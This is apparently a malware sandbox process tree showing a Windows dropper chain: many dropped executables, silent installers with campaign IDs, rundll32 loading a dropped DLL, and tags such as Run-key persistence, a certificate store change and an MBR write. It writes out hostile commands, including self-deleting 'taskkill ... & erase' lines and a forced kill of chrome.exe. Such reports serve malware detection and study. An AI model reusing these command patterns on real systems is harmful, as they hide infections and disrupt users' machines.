                                                                                                                  • C:\Windows\system32\RunDll32.exe
                                                                                                                    C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
                                                                                                                    15⤵
                                                                                                                      PID:4328
                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G
                                                                                                                        16⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:5920
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill -f /Im "sfx_123_206.exe"
                                                                                                            10⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:504
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4740
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-PNLG2.tmp\setup_2.tmp
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-PNLG2.tmp\setup_2.tmp" /SL5="$20284,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        PID:4868
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                          9⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5644
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-UBC2L.tmp\setup_2.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-UBC2L.tmp\setup_2.tmp" /SL5="$2029E,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                            10⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Drops file in Program Files directory
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            PID:5816
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-S61Q9.tmp\postback.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-S61Q9.tmp\postback.exe" ss1
                                                                                                              11⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5144
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4608
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:1348
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c Fri1018ef4aa251c026c.exe
                                                                                                4⤵
                                                                                                  PID:3932
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri1018ef4aa251c026c.exe
                                                                                                    Fri1018ef4aa251c026c.exe
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:3376
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c Fri10d184202996a0d7f.exe
                                                                                                  4⤵
                                                                                                    PID:3996
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri10d184202996a0d7f.exe
                                                                                                      Fri10d184202996a0d7f.exe
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:60
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c Fri10fcc13ae0125c8.exe
                                                                                                    4⤵
                                                                                                      PID:1672
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri10fcc13ae0125c8.exe
                                                                                                        Fri10fcc13ae0125c8.exe
                                                                                                        5⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:1136
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c Fri10acd1e0a9e6.exe /mixone
                                                                                                      4⤵
                                                                                                        PID:3856
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri10acd1e0a9e6.exe
                                                                                                          Fri10acd1e0a9e6.exe /mixone
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:1060
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "Fri10acd1e0a9e6.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri10acd1e0a9e6.exe" & exit
                                                                                                            6⤵
                                                                                                              PID:4308
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /im "Fri10acd1e0a9e6.exe" /f
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Kills process with taskkill
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:4336
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c Fri105268dda3.exe
                                                                                                          4⤵
                                                                                                            PID:3548
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri105268dda3.exe
                                                                                                              Fri105268dda3.exe
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:2812
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c Fri10720d229511df563.exe
                                                                                                            4⤵
                                                                                                              PID:744
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri10720d229511df563.exe
                                                                                                                Fri10720d229511df563.exe
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3628
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                  6⤵
                                                                                                                    PID:4728
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                      7⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:2144
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Fri1015b9a4e0b.exe
                                                                                                                4⤵
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:2852
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Fri10b0a06a73706.exe
                                                                                                                4⤵
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:2844
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri10b0a06a73706.exe
                                                                                                          Fri10b0a06a73706.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:684
                                                                                                          • C:\Users\Admin\AppData\Roaming\5348526.scr
                                                                                                            "C:\Users\Admin\AppData\Roaming\5348526.scr" /S
                                                                                                            2⤵
                                                                                                              PID:4416
                                                                                                            • C:\Users\Admin\AppData\Roaming\2617865.scr
                                                                                                              "C:\Users\Admin\AppData\Roaming\2617865.scr" /S
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Adds Run key to start application
                                                                                                              PID:4600
                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:2940
                                                                                                            • C:\Users\Admin\AppData\Roaming\5409684.scr
                                                                                                              "C:\Users\Admin\AppData\Roaming\5409684.scr" /S
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Checks whether UAC is enabled
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:4912
                                                                                                            • C:\Users\Admin\AppData\Roaming\8088767.scr
                                                                                                              "C:\Users\Admin\AppData\Roaming\8088767.scr" /S
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Checks whether UAC is enabled
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              PID:1120
                                                                                                            • C:\Users\Admin\AppData\Roaming\6283099.scr
                                                                                                              "C:\Users\Admin\AppData\Roaming\6283099.scr" /S
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:2836
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-DLA1V.tmp\Fri10fcc13ae0125c8.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-DLA1V.tmp\Fri10fcc13ae0125c8.tmp" /SL5="$3006A,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri10fcc13ae0125c8.exe"
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            PID:2828
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-IC8JC.tmp\Sayma.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-IC8JC.tmp\Sayma.exe" /S /UID=burnerch2
                                                                                                              2⤵
                                                                                                              • Drops file in Drivers directory
                                                                                                              • Executes dropped EXE
                                                                                                              • Adds Run key to start application
                                                                                                              • Drops file in Program Files directory
                                                                                                              PID:4180
                                                                                                              • C:\Program Files\Mozilla Firefox\XQEYHROKGW\ultramediaburner.exe
                                                                                                                "C:\Program Files\Mozilla Firefox\XQEYHROKGW\ultramediaburner.exe" /VERYSILENT
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5672
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-JH1HL.tmp\ultramediaburner.tmp
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-JH1HL.tmp\ultramediaburner.tmp" /SL5="$30386,281924,62464,C:\Program Files\Mozilla Firefox\XQEYHROKGW\ultramediaburner.exe" /VERYSILENT
                                                                                                                  4⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                  PID:3168
                                                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5140
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a7-c5ee4-42e-34fae-e6b5d759f9253\Fibisasylae.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a7-c5ee4-42e-34fae-e6b5d759f9253\Fibisasylae.exe"
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Checks computer location settings
                                                                                                                PID:5044
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\c1-1bbed-a5a-e6485-dbb0ec78cd9b6\Kalynowehi.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\c1-1bbed-a5a-e6485-dbb0ec78cd9b6\Kalynowehi.exe"
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:384
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qvwfplf5.0vc\GcleanerEU.exe /eufive & exit
                                                                                                                  4⤵
                                                                                                                    PID:4528
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\qvwfplf5.0vc\GcleanerEU.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\qvwfplf5.0vc\GcleanerEU.exe /eufive
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5700
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 648
                                                                                                                        6⤵
                                                                                                                        • Program crash
                                                                                                                        PID:3992
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 660
                                                                                                                        6⤵
                                                                                                                        • Program crash
                                                                                                                        PID:4124
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 776
                                                                                                                        6⤵
                                                                                                                        • Program crash
                                                                                                                        PID:4896
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 808
                                                                                                                        6⤵
                                                                                                                        • Program crash
                                                                                                                        PID:4716
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 908
                                                                                                                        6⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5368
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 508
                                                                                                                        6⤵
                                                                                                                        • Program crash
                                                                                                                        PID:6560
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 1176
                                                                                                                        6⤵
                                                                                                                        • Program crash
                                                                                                                        PID:6612
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 1212
                                                                                                                        6⤵
                                                                                                                        • Program crash
                                                                                                                        PID:6720
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 1188
                                                                                                                        6⤵
                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                        • Program crash
                                                                                                                        PID:6844
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jio4yeba.3r1\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                    4⤵
                                                                                                                      PID:5988
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jio4yeba.3r1\installer.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jio4yeba.3r1\installer.exe /qn CAMPAIGN="654"
                                                                                                                        5⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Enumerates connected drives
                                                                                                                        • Modifies system certificate store
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                        PID:4416
                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\jio4yeba.3r1\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\jio4yeba.3r1\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633291715 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                          6⤵
                                                                                                                            PID:6408
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wwoon5cw.a3a\any.exe & exit
                                                                                                                        4⤵
                                                                                                                          PID:5476
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\wwoon5cw.a3a\any.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\wwoon5cw.a3a\any.exe
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:3840
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\345zwn3s.ad3\cust2.exe & exit
                                                                                                                          4⤵
                                                                                                                            PID:5668
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\345zwn3s.ad3\cust2.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\345zwn3s.ad3\cust2.exe
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4980
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cfqcy3zr.sv2\gcleaner.exe /mixfive & exit
                                                                                                                            4⤵
                                                                                                                              PID:5076
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:4992
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\cfqcy3zr.sv2\gcleaner.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\cfqcy3zr.sv2\gcleaner.exe /mixfive
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:4820
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 648
                                                                                                                                  6⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:6140
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 652
                                                                                                                                  6⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:5576
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 764
                                                                                                                                  6⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Program crash
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:3640
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 800
                                                                                                                                  6⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:2984
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 880
                                                                                                                                  6⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:6180
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 936
                                                                                                                                  6⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:7088
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1176
                                                                                                                                  6⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:7132
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1184
                                                                                                                                  6⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:7156
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\cfqcy3zr.sv2\gcleaner.exe" & exit
                                                                                                                                  6⤵
                                                                                                                                    PID:5576
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:6140
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      taskkill /im "gcleaner.exe" /f
                                                                                                                                      7⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:6212
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zbdwjv5g.qyr\autosubplayer.exe /S & exit
                                                                                                                                4⤵
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:5072
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ttyip5jz.lsp\installer.exe /qn CAMPAIGN=654 & exit
                                                                                                                                4⤵
                                                                                                                                  PID:5736
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ttyip5jz.lsp\installer.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\ttyip5jz.lsp\installer.exe /qn CAMPAIGN=654
                                                                                                                                    5⤵
                                                                                                                                      PID:6140
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri1015b9a4e0b.exe
                                                                                                                              Fri1015b9a4e0b.exe
                                                                                                                              1⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:1664
                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                              1⤵
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              • Drops file in Windows directory
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:4596
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                2⤵
                                                                                                                                • Drops file in System32 directory
                                                                                                                                • Checks processor information in registry
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                PID:5420
                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                              1⤵
                                                                                                                              • Process spawned unexpected child process
                                                                                                                              PID:4192
                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                2⤵
                                                                                                                                  PID:5140
                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                1⤵
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                PID:4252
                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                  2⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:4208
                                                                                                                              • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                                                C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:1800
                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                  1⤵
                                                                                                                                  • Enumerates connected drives
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:5796
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 8B156F5E1AE742CC489D8E64EF71249F C
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:3604
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 5F1D77C9A94C9D0C0893A74BDCF1AB68
                                                                                                                                    2⤵
                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:6656
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                      3⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:6760
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 9ED6E3C6780DBCECDF1EE014FA23EF26 E Global\MSI0000
                                                                                                                                    2⤵
                                                                                                                                      PID:6420
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                    1⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Drops file in Windows directory
                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                    • Modifies registry class
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:5788
                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                    PID:3488
                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                    1⤵
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    PID:5756
                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                      2⤵
                                                                                                                                        PID:3640
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                      1⤵
                                                                                                                                      • Modifies registry class
                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:6220
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                      1⤵
                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:6288
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\BFBC.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\BFBC.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:7024
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                      1⤵
                                                                                                                                        PID:6888
                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                        1⤵
                                                                                                                                        • Modifies registry class
                                                                                                                                        PID:6564
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\E844.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\E844.exe
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Writes to the Master Boot Record (MBR)
                                                                                                                                        PID:4460
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\108D.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\108D.exe
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:4964
